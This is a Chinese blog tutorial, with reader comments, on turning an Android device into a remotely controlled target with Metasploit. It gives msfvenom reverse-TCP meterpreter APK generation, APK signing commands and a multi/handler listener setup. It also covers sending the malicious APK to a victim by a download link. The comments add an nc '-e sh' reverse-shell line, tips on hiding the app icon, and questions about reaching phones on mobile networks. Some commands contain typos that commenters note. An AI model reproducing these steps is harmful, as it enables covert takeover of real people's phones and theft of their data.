文章内容可能具有一定攻击性,本文仅供技术交流,如有非法使用后果自负。
在这次的实验中,我会使用kali linux和安卓模拟器演示如何使用Metasploit框架控制Android设备。
我们需要两台虚拟机:Kali Linux和安卓模拟器。
打开vm启动Kali linux。接着打开终端,使用msfvenom制作android利用程序。
Msfvenom是msfpayload和msfencode的组合。它是一个单一的工具。它有标准的命令行选项。 Msfvenom用来制造的有效载荷用来渗透Android模拟器。
一旦打开终端提示符下输入以下命令,使用msfvenom工具来创建有效载荷APK文件。
```
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1128 LPORT=4444 R > /root/Desktop/pentest.apk
```
p 设置要使用的payload
LHOST 设置用来接收反弹连接的主机
LPORT 设置用来接收反弹连接的端口
R 设置文件格式
Location 要保存的文件位置
这个命令执行完之后,你会看到一些错误,但不用担心。现在可以到输出目录查看生成的apk了。
我们已经成功创建了Android格式(APK)文件的有效载荷。现在一般Android的移动设备不允许安装没有适当签名证书的应用程序。 Android设备只安装带有签署文件的APK。
我们可以使用如下工具进行手动签名:
l Keytool (已安装)
l jar signer (已安装)
l zipalign (需要安装)
执行下列命令签名。首先使用密钥工具创建密钥库。
keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
`
然后使用JARsigner签名APK
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore APPNAME.apk aliasname`
再用JARsigner验证签名
jarsigner -verify -verbose -certs APPNAME.apk
`
Kali没有预装Zipalign,需要先apt-get install zipalign。然后用zipalign来验证apk。
zipalign -v 4 APPNAME.apk NEWAPPNAME.apk
现在我们有了一个带有签名的APK,它可以安装在任何设备上。
接下来启动metasploit的监听器。执行msfconsole打开控制台。
use exploit/multi/handler
Set PAYLOAD android/meterpreter/reverse_tcp
SET LHOST 192.168.152.128
SET LPORT 4444
Exploit
是时候将恶意的APK发送到手机上。我们这里使用一个网盘上传我们的APK,并将下载链接分享出去。
这是我们切换到安卓模拟器。
1、从https://code.google.com/archive/p/android-x86/downloads下载android x86的iso。
2、使用vmware创建一个内核版本为2.6的虚拟机。
3、挂载镜像,启动虚拟机。
4、进入Live模式。
5、设置手机并登陆谷歌帐号。
在安卓模拟器里面点击那个链接并下载。我们已经发送了一封邮件到受害者的谷歌帐号上。
另外要允许安卓安装来历不明的apk。
切换回Kali,我们发现创建了一个新的会话。
然后你就可以为所欲为的操作这台“手机”了。
11月 上海
CIS 2019首席信息安全官闭门高峰论坛11月
CIS 2019议题抢先看10月
公开课双十一活动9月 上海
CIS 2019官网上线,早鸟票同步开售
已有 27 条评论
学习了
msf的用法
请问在Kali中进行签名的时候显示无法打开jar,目前百度的资料上均是在Windows情况下的,并且我也尝试将apk放到java的bin文件夹中,可是依旧是显示无法打开jar文件。请问您是如何解决这个问题的呢。
@ 蔬菜灬蘸酱 使用java -jar 运行jar包
@ 0xroot 能给出具体的操作吗
Cobalt Strike 3.0 以上怎么监控 安卓 谁研究过?
我只知道LHOST打错了,其他看不懂
然后呢?有没有更高(wei)级(suo)的玩法?
可以的
期待更好玩的
两处小错误
1.
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1128 LPORT=4444 R > /root/Desktop/pentest.apk
ip少了个点
2.
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore APPNAME.apk aliasname
最后应该是alias_name,少了个下划线
ps.安卓4.4、5.1、6.0的模拟器:
https://sites.google.com/a/android-x86.org/web/releases/releasenote-4-4-r5
apk安装完以后有个图标,得想办法隐藏。
安卓有限版本?
也可以busybox nc 192.168.1.x 4444 -e sh
真的是非常棒啊~ 哈哈哈~找个 手机 试试去~
进行进阶操作的时候….
手机上某些软件会弹出 XXXXX 请求root权限吧………..
就算是不懂安全的noob手机里也会装个root软件
666666,这些方法我早就用过了哦
不错,抱着学习的态度看的。
安装显示未安装应用程序是对的吗?
我没有用虚拟机,用自己的3星手机。
虚拟机测试成功了,想要做真实手机测试,安卓4.1.2系统的,三星I869能安装,测试没反应,没有反弹。
@ 向阳花爱向阳 是这样的 虚拟机没试过 真实机器确实没反应
虚拟机测试成功了,想要做真实手机测试,安卓4.1.2系统的,三星I869能安装,测试没反应,没有反弹。
求指教,网络专业学生交期末作业。
这个怎么个情况 求大神 谢谢
@ zwh1458 端口占用
假如我的kali虚拟机在内网,安卓手机在外网4G在线,或者wifi在线,请问如何设置生成木马的IP
安卓7.x的是不是不行啊??
666
不粗不错,实操做出来了,开心!